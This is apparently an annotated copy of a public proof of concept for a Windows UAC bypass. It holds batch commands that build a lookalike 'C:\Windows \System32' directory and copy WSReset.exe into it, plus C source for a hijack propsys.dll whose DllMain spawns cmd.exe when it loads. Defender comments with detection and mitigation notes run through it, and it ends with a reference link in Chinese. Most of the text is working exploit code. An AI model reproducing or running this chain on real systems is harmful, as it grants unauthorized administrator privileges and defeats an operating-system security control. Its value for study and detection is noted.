
https://github.com/sailay1996/UAC_bypass_windows_store

REM Mock-trusted-directory sequence from the linked PoC, annotated for defenders.
REM The \\?\ prefix passes the path through without Win32 normalization, so the
REM trailing space is kept and a directory literally named "Windows " (with a
REM trailing space) is created beside the real C:\Windows.
mkdir "\\?\C:\Windows "
REM Mirror the System32 subdirectory inside the lookalike tree.
mkdir "\\?\C:\Windows \System32"
REM Copy the genuine WSReset.exe from the real System32 into the lookalike directory.
copy "C:\Windows\System32\WSReset.exe" "C:\Windows \System32\"
REM Place the locally built propsys.dll (source listed on this page) beside that copy.
copy "propsys.dll" "C:\Windows \System32\"
REM Start the copied binary from the lookalike path.
REM Detection: directory creation or process image paths containing "\Windows \"
REM (space before the backslash); WSReset.exe running from anywhere other than the
REM real %SystemRoot%\System32; propsys.dll loaded from outside the real System32.
REM Mitigation commonly recommended for auto-elevation abuse: UAC at "Always notify"
REM and daily use of standard (non-administrator) accounts.
"C:\Windows \System32\WSReset.exe"
#include <windows.h> 
#include <Winuser.h>

// x86-w64-mingw32-gcc -shared -o propsys.dll propsys.c -lcomctl32 -Wl,--subsystem,windows

// @404death

// Payload routine of the PoC DLL; DllMain in this file calls it on process attach.
// Shows a message box, then starts cmd.exe through WinExec. The WinExec result is
// not checked and the function always returns 0.
// NOTE(review): nothing here elevates by itself. The new process is created by
// whichever process loaded the DLL and presumably runs with that process's token;
// on this page that loader is the copy of WSReset.exe in "C:\Windows \System32\".
int sailayv(){
// Visible marker for the demo; MB_OK gives a dialog with a single OK button.
MessageBox(0, "Spawnning shell as Administrator", "pwned!!!", MB_OK);
// Second argument is uCmdShow; 0 is the numeric value of SW_HIDE.
// Defender note: the observable artifact is cmd.exe created as a child of the
// process that loaded this DLL.
WinExec("cmd.exe /k C:\\windows\\system32\\cmd.exe", 0);
// ExitProcess(0);
return 0;
}

// DLL entry point. hinstDLL and lpvReserved are not used.
// Calls sailayv() when fdwReason is DLL_PROCESS_ATTACH and does nothing for the
// other notification reasons. Always returns TRUE.
// Defender note: the payload runs as a side effect of the DLL being loaded, so the
// relevant telemetry is the image-load event (propsys.dll from a non-system path),
// not a call to any exported function.
BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
// Run the payload once, at the moment the DLL is mapped into the process.
if (fdwReason == DLL_PROCESS_ATTACH)
{
sailayv();
}

return TRUE;
}

https://github.com/sailay1996/UAC_bypass_windows_store

类似的参考例子——通过模拟可信目录绕过 UAC:https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/